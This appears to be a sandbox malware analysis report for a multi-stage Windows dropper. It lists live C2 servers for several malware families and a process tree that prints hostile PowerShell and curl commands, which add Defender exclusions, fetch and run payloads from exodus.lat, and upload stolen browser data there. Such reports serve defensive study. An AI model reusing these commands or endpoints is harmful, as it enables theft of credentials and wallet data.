Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/12/2024, 02:16 UTC

General

  • Target

    1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe

  • Size

    5.4MB

  • MD5

    d8e277397a6ffa5f6d556c76ccaefe44

  • SHA1

    544877ae6fb4d5f5252e6b191c51dbc62981da8a

  • SHA256

    1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e

  • SHA512

    6c41384aeb0343d2f771a1c693c27363ddc31fc88b0fa54db2bba6f46fee87d7f0d0d6620c6de8f4875a6afd819646d18404ceb76736bd87bf6d0e9743b54725

  • SSDEEP

    98304:A3Mo6YwJNkk3IHikKQ7bbCUvCGMYtqClKwQv7EKGUG6N1BqLHshga2k6QwCTC0U0:AZ6YgNkvKCCUvCZYRsVv7fGUGSBq7vPk

Malware Config

Extracted

Language
ps1
Deobfuscated
1
&{(new-object net.webclient).downloadfile("https://exodus.lat/COMSurrogate.exe", "C:\\Users\\Admin\\AppData\\Local\\asm\\COMSurrogate.exe")}
2
URLs
exe.dropper

https://exodus.lat/COMSurrogate.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain
1
006700e5a2ab05704bbb0c589b88924d

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

https://ratiomun.cyou/api

Extracted

Family

stealc

Botnet

drum

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

orcus

C2

45.74.38.211:4782

Mutex

7a9c0f279c464958aebbd585f20f1cf2

Attributes
  • autostart_method

    Disable

  • enable_keylogger

    false

  • install_path

    %programfiles%\Orcus\Orcus.exe

  • reconnect_delay

    10000

  • registry_keyname

    Orcus

  • taskscheduler_taskname

    Orcus

  • watchdog_path

    AppData\OrcusWatchdog.exe

Extracted

Family

gcleaner

C2

92.63.197.221

45.91.200.135

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://se-blurry.biz/api

https://zinc-sneark.biz/api

https://dwell-exclaim.biz/api

https://formy-spill.biz/api

https://covery-mover.biz/api

https://dare-curbys.biz/api

https://print-vexer.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Orcus

    Orcus is a Remote Access Trojan that is being sold on underground forums.

  • Orcus family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • TA505

    Cybercrime group active since 2015, responsible for families like Dridex and Locky.

  • Ta505 family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Orcurs Rat Executable 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 23 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 59 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of FindShellTrayWindow 38 IoCs
  • Suspicious use of SendNotifyMessage 34 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3364
      • C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe
        "C:\Users\Admin\AppData\Local\Temp\1e4062e1c5d86c1bc855d10e16bf457c5fb5bddcb1ddc9093c0e0d8bc569b35e.exe"
        2⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3448
        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe
          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\T5v89.exe
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4048
          • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe
            C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1G18s2.exe
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:1848
            • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
              "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2564
              • C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe
                "C:\Users\Admin\AppData\Local\Temp\1012056001\BhD8htX.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4764
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 1640
                  7⤵
                  • Program crash
                  PID:4532
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4764 -s 1620
                  7⤵
                  • Program crash
                  PID:3952
              • C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe
                "C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2068
                • C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-OIS64.tmp\i1A5m12.tmp" /SL5="$80238,3291517,54272,C:\Users\Admin\AppData\Local\Temp\1012382001\i1A5m12.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of WriteProcessMemory
                  PID:1988
                  • C:\Windows\SysWOW64\net.exe
                    "C:\Windows\system32\net.exe" pause raf_encoder_1252
                    8⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:3844
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 pause raf_encoder_1252
                      9⤵
                      • System Location Discovery: System Language Discovery
                      PID:2544
                  • C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe
                    "C:\Users\Admin\AppData\Local\RAF Encoder 1.0.1.55\rafencoder.exe" -i
                    8⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1888
              • C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe
                "C:\Users\Admin\AppData\Local\Temp\1012475001\wL3EGdM.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3620
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c copy Audit Audit.cmd && Audit.cmd
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4956
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    8⤵
                    • Enumerates processes with tasklist
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2044
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /I "wrsa opssvc"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:3844
                  • C:\Windows\SysWOW64\tasklist.exe
                    tasklist
                    8⤵
                    • Enumerates processes with tasklist
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2544
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:1896
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c md 491505
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2208
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c copy /b ..\Dentists + ..\Flavor + ..\Disturbed + ..\Artistic + ..\Justice + ..\Proceeds + ..\Zip + ..\Soundtrack + ..\Revenue B
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:544
                  • C:\Users\Admin\AppData\Local\Temp\491505\Dr.com
                    Dr.com B
                    8⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:3564
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks.exe /create /tn "ApolloPro" /tr "wscript //B 'C:\Users\Admin\AppData\Local\CreativePixel Tech\ApolloPro.js'" /sc onlogon /F /RL HIGHEST
                      9⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:1264
                    • C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe
                      C:\Users\Admin\AppData\Local\Temp\491505\RegAsm.exe
                      9⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3548
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\download.bat" "
                        10⤵
                        • System Location Discovery: System Language Discovery
                        PID:6340
                        • C:\Windows\SysWOW64\net.exe
                          net session
                          11⤵
                          • System Location Discovery: System Language Discovery
                          PID:6404
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 session
                            12⤵
                            • System Location Discovery: System Language Discovery
                            PID:6432
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"
                          11⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:6456
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"
                          11⤵
                          • Blocklisted process makes network request
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:812
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                          11⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5748
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\runsteal.bat" "
                        10⤵
                        • System Location Discovery: System Language Discovery
                        PID:6708
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -Command "Invoke-WebRequest -Uri 'https://exodus.lat/ss.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat' -UseBasicParsing"
                          11⤵
                          • Blocklisted process makes network request
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:6876
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat"
                          11⤵
                          • System Location Discovery: System Language Discovery
                          PID:5524
                          • C:\Windows\SysWOW64\xcopy.exe
                            xcopy /E /I "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\*" "C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\"
                            12⤵
                            • System Location Discovery: System Language Discovery
                            • Enumerates system info in registry
                            PID:4408
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
                            12⤵
                            • System Location Discovery: System Language Discovery
                            PID:6052
                            • C:\Windows\SysWOW64\curl.exe
                              curl -s https://api.ipify.org
                              13⤵
                              • System Location Discovery: System Language Discovery
                              PID:6060
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -command "Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\ArchiveContents\*' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip'"
                            12⤵
                            • Command and Scripting Interpreter: PowerShell
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4524
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"
                            12⤵
                            • System Location Discovery: System Language Discovery
                            PID:3060
                            • C:\Windows\SysWOW64\curl.exe
                              curl -F "file=@C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip" "https://exodus.lat/files/upload.php"
                              13⤵
                              • System Location Discovery: System Language Discovery
                              PID:3828
                      • C:\Users\Admin\AppData\Local\Temp\smartscreen.exe
                        "C:\Users\Admin\AppData\Local\Temp\smartscreen.exe"
                        10⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        PID:6616
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\checkmiexe.bat" "
                        10⤵
                        • System Location Discovery: System Language Discovery
                        PID:6924
                        • C:\Windows\SysWOW64\net.exe
                          net session
                          11⤵
                          • System Location Discovery: System Language Discovery
                          PID:3248
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 session
                            12⤵
                            • System Location Discovery: System Language Discovery
                            PID:4732
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\asm'"
                          11⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5188
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden -Command "& { (New-Object Net.WebClient).DownloadFile('https://exodus.lat/COMSurrogate.exe', 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe') }"
                          11⤵
                          • Blocklisted process makes network request
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5628
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe' -WindowStyle Hidden"
                          11⤵
                          • Command and Scripting Interpreter: PowerShell
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4872
                          • C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe
                            "C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe"
                            12⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of AdjustPrivilegeToken
                            PID:6300
                            • C:\Users\Admin\AppData\Local\asm\mi.exe
                              "C:\Users\Admin\AppData\Local\asm\mi.exe" --config="C:\Users\Admin\AppData\Local\asm\config.json"
                              13⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of FindShellTrayWindow
                              PID:2020
                  • C:\Windows\SysWOW64\choice.exe
                    choice /d y /t 15
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:1312
              • C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe
                "C:\Users\Admin\AppData\Local\Temp\1012575001\f56e441c8f.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1500
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1632
                  7⤵
                  • Program crash
                  PID:4748
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1500 -s 1652
                  7⤵
                  • Program crash
                  PID:3936
              • C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe
                "C:\Users\Admin\AppData\Local\Temp\1012576001\1dd8bdd825.exe"
                6⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2388
              • C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe
                "C:\Users\Admin\AppData\Local\Temp\1012577001\69efc78da7.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:512
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM firefox.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4532
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM chrome.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2324
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM msedge.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4796
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM opera.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4704
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /F /IM brave.exe /T
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4572
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                  7⤵
                    PID:4396
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                      8⤵
                      • Checks processor information in registry
                      • Modifies registry class
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      • Suspicious use of SetWindowsHookEx
                      PID:1852
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2036 -parentBuildID 20240401114208 -prefsHandle 1964 -prefMapHandle 1956 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {95f03138-6534-469c-8f21-5220d70f3425} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" gpu
                        9⤵
                          PID:628
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2448 -prefMapHandle 2436 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a9b937f-b66b-4cc9-a25d-ce5d9d590e9a} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" socket
                          9⤵
                            PID:1172
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3132 -childID 1 -isForBrowser -prefsHandle 3124 -prefMapHandle 3120 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0d9752fd-55e6-47e9-b2d7-aad876e04da4} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab
                            9⤵
                              PID:216
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4124 -childID 2 -isForBrowser -prefsHandle 4196 -prefMapHandle 4192 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {64c0a44d-dba6-499e-8750-28083730bc69} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab
                              9⤵
                                PID:1140
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4744 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4840 -prefMapHandle 4836 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4af03d6e-1024-4cb8-ab8e-fbff5239d5a3} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" utility
                                9⤵
                                • Checks processor information in registry
                                PID:5180
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5312 -childID 3 -isForBrowser -prefsHandle 5300 -prefMapHandle 5304 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {89a3350a-4d71-49fb-ae2d-0bb5475aadd7} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab
                                9⤵
                                  PID:7068
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5452 -childID 4 -isForBrowser -prefsHandle 5372 -prefMapHandle 5380 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e83fb09-95a2-42b0-b296-22cf085bf81a} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab
                                  9⤵
                                    PID:7140
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5360 -childID 5 -isForBrowser -prefsHandle 5588 -prefMapHandle 5592 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 936 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c0e71c56-2449-4833-8005-4cf322f47822} 1852 "\\.\pipe\gecko-crash-server-pipe.1852" tab
                                    9⤵
                                      PID:2904
                              • C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe
                                "C:\Users\Admin\AppData\Local\Temp\1012578001\b3da59fcc7.exe"
                                6⤵
                                • Modifies Windows Defender Real-time Protection settings
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Windows security modification
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:6684
                              • C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe
                                "C:\Users\Admin\AppData\Local\Temp\1012579001\4fe69191d8.exe"
                                6⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                PID:5732
                          • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe
                            C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2M4078.exe
                            4⤵
                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                            • Checks BIOS information in registry
                            • Executes dropped EXE
                            • Identifies Wine through registry keys
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            PID:2904
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 1648
                              5⤵
                              • Program crash
                              PID:3652
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 1664
                              5⤵
                              • Program crash
                              PID:3468
                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe
                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3Z39A.exe
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1912
